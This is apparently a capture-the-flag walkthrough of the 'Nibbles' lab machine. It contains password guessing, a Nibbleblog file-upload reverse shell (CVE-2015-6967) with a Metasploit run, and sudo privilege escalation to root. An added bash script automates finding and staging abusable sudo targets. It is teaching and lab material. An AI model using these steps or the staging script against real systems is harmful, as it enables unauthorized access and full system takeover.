We get back the following result showing that two ports are open:
Port 80: running Apache httpd 2.4.18
Port 22: running OpenSSH 7.2p2
Enumeration: Website - Port 80
Nothing useful there, so view the page source (right-click and select View Page Source, or press CTRL + U). We find an HTML comment that points us to a new directory, /nibbleblog/.
This leads us to the following page. You can see at the bottom that it is powered by Nibbleblog. This is an indication that it is off-the-shelf software as opposed to custom software, so it is worth looking for a version number and known vulnerabilities.
Digging deeper, there’s a page at /nibbleblog/content/private/users.xml which reveals a user, admin, as well as the IPs that have tried to log in as it:
http://10.10.10.75/nibbleblog/update.php
DB updated: ./content/private/config.xml
DB updated: ./content/private/comments.xml
http://10.10.10.75/nibbleblog/README
Version: v4.0.3
===== About the author =====
Name: Diego Najar E-mail: dignajar@gmail.com
Linkedin: http://www.linkedin.com/in/dignajar
I wasn’t able to locate a password elsewhere on the blog, and Nibbleblog doesn’t ship with a default password. Luckily, guessing nibbles (the box name) as the admin password worked, and we are in:
Remote Code Execution (via file upload):
The README found during enumeration (it also shows up in the gobuster results) gives us the version, v4.0.3.
This version of Nibbleblog is vulnerable to CVE-2015-6967, an authenticated arbitrary file upload through the My Image plugin that leads to code execution. There is a Metasploit module for it, and it is also straightforward to do manually.
CVE-2015-6967:
Now we need admin credentials. When I’m presented with a login page, the first thing I try is common credentials (admin/admin, admin/nibbles, nibbles/nibbles, nibbles/admin). If that doesn’t work out, I look for default credentials online that are specific to the technology. Last, I use a password cracker if all else fails. Note that users.xml was recording the IPs that had tried to log in as admin, so a noisy brute force should be a last resort here.
Next, we need to navigate to the My Image plugin. Click on Plugins > My image > Configure.
Get the code for a PHP reverse shell. Change the IP address and port to those of your attack machine. Then save it in a file called image.php and upload it through the plugin's configuration page. The plugin accepts the .php extension without complaint, which is the whole vulnerability.
Start a listener on the above chosen port.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
In the browser, navigate to the uploaded file at /nibbleblog/content/private/plugins/my_image/image.php to run the reverse shell script. The listener catches the connection:
┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.75] 57330
Let’s first upgrade to a better shell. Python 2 is not installed, but python3 is, so spawn a pty with it:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Metasploit –> Meterpreter
We’ll use multi/http/nibbleblog_file_upload to get a shell on the box.
┌──(kali💀kali)-[~]
└─$ msfconsole
msf6 > use multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > info
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.16.4
msf6 exploit(multi/http/nibbleblog_file_upload) > run
meterpreter > shell
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
user.txt:
From there, we’ll upgrade our shell, and then get user.txt:
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home
nibbler@Nibbles:/home$ cd nibbler
nibbler@Nibbles:/home/nibbler$ cat user.txt
455db----------------------------------
Privilege Escalation
First find out what privileges you have. Either by running LinEnum.sh or just by checking sudo -l, we’ll see the following:
nibbler@Nibbles:/home/nibbler$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
So nibbler can run /home/nibbler/personal/stuff/monitor.sh as root without a password. If we go and try to access it, we find that the personal directory does not exist. That is not a problem: the path sits under /home/nibbler, which we own, so we can create the directory and the script ourselves, and sudo will run whatever we put there as root:
cd /home/nibbler
mkdir -p personal/stuff
cd /home/nibbler/personal/stuff
Now that we have the directories ready, let's create our script. nano is not installed, so we need to use the vi text editor:
nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh
When vi opens, press i to enter insert mode, then paste this script, which simply spawns bash (as root, when run through sudo):
#!/bin/sh
bash
Then press ESC, type :wq and press Enter to save and exit. Make the script executable with chmod +x monitor.sh before running it through sudo, otherwise sudo will refuse to execute it.
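The privilege escalation above works because the sudo rule points at a path that does not exist yet but lives under a directory nibbler owns. As an added example that is not part of the original write-up, the script below automates that check: it parses the NOPASSWD targets out of `sudo -l` output, reports whether each target is writable, creatable (missing, but under a directory we can write to) or locked, and stages the same two-line monitor.sh the manual steps create. The `sudo -l` text is a constructed copy of the output shown above; the function names and the use of a scratch directory instead of the real /home/nibbler are my own choices.

```bash
#!/bin/bash
# Added example (not from the original write-up): audit NOPASSWD sudo
# targets for paths the current user can create or overwrite.

# Constructed copy of the `sudo -l` output shown in the write-up.
SUDO_L_OUTPUT='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# Print every absolute command path that follows "NOPASSWD:", one per line.
# Arguments after the command are dropped; comma-separated lists are split.
nopasswd_paths() {
    printf '%s\n' "$1" | sed -n 's/.*NOPASSWD:[[:space:]]*//p' | tr ',' '\n' \
        | sed 's/^[[:space:]]*//; s/[[:space:]].*//' | grep '^/'
}

# Walk up from $1 to the first path component that actually exists.
existing_ancestor() {
    local p="$1"
    while [ ! -e "$p" ] && [ "$p" != "/" ]; do
        p=$(dirname "$p")
    done
    printf '%s\n' "$p"
}

# Classify a sudo target:
#   writable  - the file exists and we can replace its contents
#   creatable - the file is missing and its nearest existing parent is ours to write
#   locked    - neither (the rule is not directly abusable this way)
classify_target() {
    local target="$1" anc
    if [ -e "$target" ]; then
        [ -w "$target" ] && echo writable || echo locked
        return
    fi
    anc=$(existing_ancestor "$target")
    [ -d "$anc" ] && [ -w "$anc" ] && echo creatable || echo locked
}

# Create the missing directories and drop the same script the manual steps
# build with vi: a shell wrapper that runs bash (as root under sudo).
stage_shell_script() {
    local target="$1"
    mkdir -p "$(dirname "$target")"
    printf '#!/bin/sh\nbash\n' > "$target"
    chmod +x "$target"   # sudo will not execute a non-executable file
}

# Usage: classify each target from the constructed output. The paths are
# re-rooted under a scratch directory so the demo never touches /home.
main() {
    local scratch target demo
    scratch=$(mktemp -d)
    mkdir -p "$scratch/home/nibbler"   # stands in for the nibbler-owned home dir
    nopasswd_paths "$SUDO_L_OUTPUT" | while read -r target; do
        demo="$scratch$target"
        printf '%s: %s\n' "$target" "$(classify_target "$demo")"
        if [ "$(classify_target "$demo")" = creatable ]; then
            stage_shell_script "$demo"
            printf 'staged %s; on the box you would now run: sudo %s\n' "$demo" "$target"
        fi
    done
}

main "$@"
```

On the target the final step is `sudo /home/nibbler/personal/stuff/monitor.sh`, which drops you into a root bash. The same classification is what a defender should run over their own sudoers: any NOPASSWD rule whose target is missing, or is under a user-writable directory, is equivalent to granting that user root.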